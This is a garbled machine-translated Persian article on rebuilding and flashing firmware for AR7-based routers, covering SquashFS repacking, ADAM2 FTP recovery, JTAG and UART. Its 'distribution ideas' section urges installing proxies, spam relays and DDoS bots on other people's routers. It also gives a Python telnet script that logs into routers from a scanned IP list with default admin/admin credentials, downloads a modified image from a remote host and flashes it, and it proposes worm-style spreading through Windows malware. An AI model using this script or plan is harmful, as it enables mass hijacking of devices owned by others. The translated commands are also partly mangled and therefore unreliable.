طبق قوانین توضیح داده شده در /etc/progdefs.xml. اکنون زمان آن فرا رسیده است
تغییر و فلش کردن تصاویر سیستم فایل

اصلاح سیستم فایل

برای تغییر سیستم فایل، ابتدا باید
باز کردن بسته بندی همانطور که قبلاً اشاره کردم، سیستم فایل در اینجا SquashFs با پچ LZMA است.
بسته توسعه سیستم عامل فقط شامل برنامه mksquashfs (برای ایجاد
تصویر)، unsquashfs (برای باز کردن بسته بندی) وجود ندارد. اما مهم نیست، همه چیز در دسترس است
در وب سایت سیستم فایل، به نسخه اول نیاز داریم. با اعمال پچ LZMA و
پس از جمع آوری وسایل برقی، آنها را در یک مکان مناسب کنار گذاشتیم. ابتدا تصویر را دریافت می کنیم
سیستم فایل از روتر:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

اکنون می توانید آن را هر طور که دوست دارید تغییر دهید، و می توانید FuckTheWorld را برای ما ارسال کنید
دایرکتوری bin / و یک قانون برای اجرا در /etc/progdefs.xml اضافه کنید.

$ cp سلام unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

و این را اضافه می کنیم (بین تگ ها ):

جهنم
/bin/hell

ذخیره و بسته بندی مجدد:

$ mksquashfs unpacked_fs my_fs.img -noappend

لطفا توجه داشته باشید که تصویر سیستم فایل نباید بیشتر باشد
اندازه های قابل قبول اگر احساس می‌کنید که می‌خواهید چیزی را فوراً امتحان کنید، اما این کار را نمی‌کند
مناسب است، هر چیزی "غیر ضروری" را از تصویر حذف کنید، مانند grep، whoami، یا
از بسته‌بندی فایل اجرایی UPX استفاده کنید. اکنون آن را در روتر دانلود کنید
تصویر و به بخش بعدی بروید.

ضبط تصویر سیستم فایل

روش فلش کردن روتر بسیار ساده است و شامل دسترسی به دستگاه است
/dev/mtdblock/*. بنابراین، تصویر فایل را به هر روشی مناسب در روتر آپلود کنید.
سیستم و این عمل ساده را انجام دهید:

# cat my_fs.img > /dev/mtdblock/0 && راه اندازی مجدد

# cp my_fs.img /dev/mtdblock/0 && راه اندازی مجدد

پس از مدتی، هنگامی که فرآیند ضبط به پایان رسید، روتر راه اندازی مجدد می شود و
تغییرات اعمال خواهد شد بیایید سعی کنیم مثال خود را اجرا کنیم:

# جهنم
Mate. Feed. Kill. Repeat.

روش های بازیابی در صورت شکست

قبل از اینکه روتر خود را با "صنایع دستی" جدی تر فلش کنید، باید نحوه انجام آن را بیابید
در موارد بحرانی که روتر امتناع می کند، اقدام کند
بار. هیچ موقعیت ناامید کننده ای وجود ندارد. سرور ADAM2 FTP به کمک می آید. برای
ابتدا باید یک کلاینت FTP را به آدرس IP ADAM2 راه اندازی کنید که می توانید از آن جاسوسی کنید
در /proc/ticfg/env (پارامتر my_ipaddress).

$ftp 192.168.1.199
سرور 220 ADAM2 FTP آماده است.
530 لطفا با USER و PASS وارد شوید.

برای وضوح، می توانید حالت اشکال زدایی و سپس همه را روشن کنید
اطلاعات و تمام پاسخ های FTP:

ورود/گذرواژه – adam2/adam2. فرآیند فلش کردن بسیار ساده است. برای شروع
جلسه FTP را به حالت باینری تغییر دهید:

ftp> نقل قول MEDIA FLSH

حالا برای مثال تصویری از فایل سیستم ارسال می کنیم و مکان را مشخص می کنیم
مقاصد:

ftp> قرار دادن fs.img "fs.img mtd0"

ما منتظر پایان ضبط هستیم، روتر را راه اندازی مجدد کنید، از جلسه خارج شوید:

ftp> نقل قول راه اندازی مجدد
ftp> خروج

همه! همانطور که می بینید، هیچ چیز پیچیده ای وجود ندارد، حالا اگر مشکلی پیش بیاید، شما
شما همیشه می توانید وضعیت را اصلاح کنید.

برای سهولت استفاده، باید یک آدرس IP معمولی را فعال کنید
بارگیری خودکار (به طوری که با تنظیم مجدد رقص نکنید) و زمان را کمی افزایش دهید
انتظار برای اتصال قبل از بارگیری کرنل. همه این پارامترها در ذخیره می شوند
متغیرهای محیطی، دستورات ویژه FTP ADAM2 وجود دارد: GETENV و SETENV (برای
به ترتیب متغیر را دریافت و تنظیم کنید). در جلسه FTP موارد زیر را وارد کنید
دستورات:

ftp> بارگذاری خودکار SETENV، 1
ftp> SETENV autoload_timeout,8
ftp>SETENV my_ipaddress,192.168.1.1
ftp> نقل قول راه اندازی مجدد
ftp> خروج

روتر راه اندازی مجدد می شود و می توانید به ADAM2 در 192.168.1.1:21 دسترسی داشته باشید. اگر
تمایل به بازتاب مجدد تصویر هسته وجود خواهد داشت و هسته از بوت کردن، FTP خودداری می کند.
خود به خود شروع خواهد شد. قبل از فلش کردن تصاویر اصلاح شده، حتما این کار را انجام دهید
موارد فعلی را برای بازیابی ذخیره کنید. به طور کلی می توانید متغیرهای محیط را تغییر دهید
و از طریق /proc/ticfg/env، من فقط می خواستم در مورد کار با FTP بیشتر به شما بگویم.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

می توانید تغییرات را به صورت زیر بررسی کنید:

# cat /proc/ticfg/env | grep my_ipaddress

اگر می خواهید بوت لودر را مجدداً فلش کنید چه باید کرد و چگونه
در صورت شکست چه باید کرد؟ یا روتر به دلایلی شروع نمی شود و
دسترسی به ADAM2 ندارید؟ یک راه حل وجود دارد - JTAG، یا بهتر است بگوییم، این تراشه حاوی EJTAG است
(نسخه توسعه یافته). این یک رابط برای اشکال زدایی/برنامه نویسی در مدار است.

برای اتصال به این رابط به یک پورت LPT کامپیوتر نیاز داریم،
کانکتور و 4 مقاومت طرح ساده است.

من عجله می کنم که سیستم عامل از طریق JTAG کار سریعی نیست، بسیار طول می کشد
زمان زیاد. بنابراین فقط باید برای بازیابی بوت لودر استفاده شود،
حتی اگر کار نکند برای برقراری ارتباط از طریق JTAG، باید از یک ویژه استفاده کنید
برنامه، به عنوان مثال UrJTAG. در زیر نمونه ای از نحوه عملکرد این رابط را مشاهده می کنید.
راه اندازی اتصال:

jtag> کابل موازی 0x378 DLC5
jtag> شناسایی

تشخیص حافظه فلش:

jtag> detectflash 0x30000000 1

خواندن حافظه فلش:

jtag> readmem 0x30000000 0x400000 fullflash.img

نوشتن در حافظه (بوت لودر):

jtag> flashem 0x30000000 adam2.img

همچنین دانستن در مورد رابط UART مفید است (قبلاً قول داده بودم در مورد آن صحبت کنم). که در
UART_A گزارش می دهد، یعنی بوت لودر را ثبت می کند (در مرحله اولیه بوت شدن از
می توانید با او ارتباط برقرار کنید) و هسته. هنگام نوشتن کرنل های اصلاح شده این
برای رفع اشکال ضروری است. UART - گیرنده/فرستنده ناهمزمان جهانی
(فرستنده ناهمزمان جهانی) تقریباً همیشه روشن است
میکروکنترلرها

مدار آداپتور بسیار ساده است. بر اساس تنها یک تراشه -
مبدل سطح TTL: MAX232 برای COM و FT232R برای USB. ریز مدارها
آنها بسیار رایج هستند و هیچ مشکلی در خرید وجود نخواهد داشت.

مدار بر روی تخته نان (که به راحتی در یک کیس قرار می گیرد) مونتاژ می شود
کانکتور پورت COM) در 20 دقیقه و مزایای زیادی را به همراه دارد. به عنوان مثال، هنگام اشکال زدایی
هسته ها یک راه حل کاملا غیرقابل جایگزین هستند. اگر لوازم الکترونیکی مشکل ساز باشد چه؟ خارج شوید
کابل های USB برای گوشی های قدیمی هستند، آنها فقط یک مبدل دارند
UART - USB.

چند ایده توزیع

داشتن پروکسی/سوکس خود در روتر شخص دیگری عالی است. درست مثل ارسال هرزنامه
روتر برای همه پروتکل ها این یک کامپیوتر ویندوزی نیست، که
هر ماه مرتب می شود :). روترها اغلب تغییر نمی کنند یا دوباره فلش می شوند. بله و
چه کسی غیر از ما حتی به فکر آلوده کردن یک روتر است؟

فراموش نکنید، ما بر تمام ترافیک کاربر/شبکه ​​کنترل داریم. برای بیشتر
در روترهای قدرتمند، امکان آویز کردن ربات DDOS وجود دارد. مخفی کردن فایل/پنهان کردن فرآیند،
رهگیری نوشتن در بلوک های mtd بدون بازنویسی برنامه ما - همه اینها
هر چه!

فرض کنید می خواهید شروع به نوشتن یک برنامه جدی برای روتر کنید.
اشکال زدایی بسیار خوب مهم است، احتمالاً باید چندین بار آن را انجام دهید
بازنویسی/بازیابی تصاویر... این یک چشم انداز بسیار غم انگیز است. حتی دست ها
اگر منبع بازنویسی حافظه فلش را نیز در نظر بگیرید، کمی رها کنید
کوچک است (جزئیات بیشتر در اسناد مربوط به تراشه حافظه)، و چشم انداز وجود دارد
خرابش کن اما راهی برای خروج وجود دارد! Qemu می تواند AR7 را تقلید کند! می توانید تصور کنید چه چیزی
آیا فرصت ها و راحتی نامحدود را فراهم می کند؟ حالا هیچ چیز ما را متوقف نمی کند
چیزی فوق العاده جالب بنویس!

بنابراین. شما یک برنامه نوشتید، آن را روی روترهای خودتان یا 1-2 نفر دیگر تست کردید، اما
کل شبکه هنوز در پیش است، آلوده کردن دستی آن یک کار طاقت فرسا است، در روتر دهمی که قبلاً شروع کرده اید
لعنت به تمام دنیا، و رشته های «گربه» و «متد» در چشمانت شناور است. بیا بنویسیم
برنامه ای برای خودکارسازی این اقدامات روتین. من زبان پایتون را انتخاب کردم.

برنامه کاری به شرح زیر است:

  • برای مثال با استفاده از nmap فهرستی از روترها را جمع آوری کنید.
  • اسکریپت باید آدرس های IP را به ترتیب از لیست بگیرد، از طریق وارد کنید
    شبکه راه دور با ورود / رمز عبور استاندارد؛
  • سپس همان مراحل: آپلود تصویر اصلاح شده،
    بازنویسی، راه اندازی مجدد

#!/usr/bin/env پایتون
#Encode=UTF-8

واردات telnetlib، زمان

SERVER="http://anyhost.com/fs.image"

برای adr در open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep (5)
telnet.write ("admin\n")
telnet.read_until("رمز عبور:")
telnet.write ("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget" + SERVER)
telnet.read_until("#")
telnet.write ("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write ("راه اندازی مجدد")
telnet.close()

منطق فیلمنامه بسیار دور از ایده آل است، حالا دلیل آن را توضیح می دهم. برای
ابتدا باید نسخه سیستم عامل/هسته و مدل روتر را بررسی کنید، زیرا ممکن است وجود داشته باشد
تفاوت های جدی در کار در مرحله بعد، به جای خالی های میان افزار، باید دانلود کنید
تصویر سیستم فایل از روتر، باز کردن بسته بندی، تغییر و ارسال
بازگشت. این مشکلات ناشی از سازگاری در موارد مختلف را از بین می برد
مدل‌ها/نسخه‌های میان‌افزار، زیرا ثبات عملکرد برای شما مهم‌ترین چیز است.
همچنین، یک ویروس می تواند عملکرد یک کرم را داشته باشد، و اگر بخواهید، همیشه می توانید
یک اسکنر شبکه، brute force برای RDP و ویژگی های مشابه را به آن وصل کنید.

یک راه عالی دیگر برای توزیع وجود دارد. هیچ چیز شما را از نوشتن باز نمی دارد
برنامه ای برای ویندوز، که آن را همراه خود خواهید داشت (یا از خود دانلود کنید
سرور) تصویر سیستم را فایل کنید و در صورت وجود، روتر را با آن آلوده کنید.
این برنامه را به تمام روش های "استاندارد" توزیع کنید: درایوهای قابل جابجایی،
اکسپلویت برای برنامه ها، آلوده شدن برنامه های دیگر... با ترکیب این روش ها،
شما می توانید یک بیماری همه گیر جدی ایجاد کنید. فقط این تصویر را تصور کنید - بالاخره
چنین دستگاه هایی در همه جا وجود دارند.

محافظت از روتر

پس از حفاری همه اینها، فکر کردم: چگونه می توانم از روتر محافظت کنم؟ و سپس، می بینید، و
من خودم به آنجا خواهم رسید. اولین قدم این است که رمز عبور کاربر را به یک رمز عبور پیچیده تر تغییر دهید
طولانی (محدودیت 8 کاراکتر)، تغییر بنرها و تبریک خدمات
(ویرایشگر هگز، یا ترجیحاً برنامه ها را دوباره کامپایل کنید) به ترتیب
nmap یا سایر اسکنرها نمی توانند نسخه های سرویس را تعیین کنند.

همچنین باید پورت هایی که دیمون ها روی آن آویزان هستند را تغییر دهید. این کار توسط
تغییرات در progdefs.xml. Telnet را بکش (آسانترین راه برای حدس زدن رمز عبور، بله
و پروتکل محافظت نشده است، چرا به آن نیاز داریم)، ​​فایروال را فعال کنید، اتصال را مجاز کنید
فقط از آدرس IP یا MAC خود به خدمات دسترسی داشته باشید. از فایروال هم استفاده کنید
برای محافظت از یک شبکه یا رایانه، بی جهت نیست که وجود دارد. راه اندازی هوشمند
قوانین همیشه به شما کمک می کند از خود محافظت کنید.

نتیجه

نه تنها روترهای D-Link و سایر دستگاه های مشابه روی بسیاری ساخته شده اند
چیپ AR7، لیست شامل Acorp، NetGear، Linksys، Actionec... کاملا
این AR7 همراه با MontaVista محبوب است. نتیجه می شود که با استفاده از همان
toolchain، می توانید بدون هیچ مشکلی مراحل توضیح داده شده در مقاله را انجام دهید.

در مورد آن فکر کنید: علاوه بر اعمال مضر، می توانید برای خود کاری مفید/خوشایند نیز انجام دهید
و دیگران (من بحث نمی کنم، لذت هک نمی تواند جایگزین شود، اما هنوز).
شما می توانید سیستم عامل خود را بسازید، به عنوان مثال، روترهای قدرتمندتری که می توانند
دانلود / توزیع تورنت ... همه مدل ها دارای رابط USB 1.1 هستند اما در مدل های جوان تر
مدل های آن لحیم کاری نشده است. یک ماژول USB و یک درایور سیستم فایل را به هسته اضافه کنید،
روتر را به حافظه فلش مجهز کنید - و در پایان یک نوع ذخیره سازی شبکه برای آن دریافت می کنید
پول کم گزینه های زیادی وجود دارد، اما ایده ها باید هزاران نفر به وجود بیایند - نه
خود را محدود کنید، ایجاد کنید و خلق کنید!

بهترین مقالات در این زمینه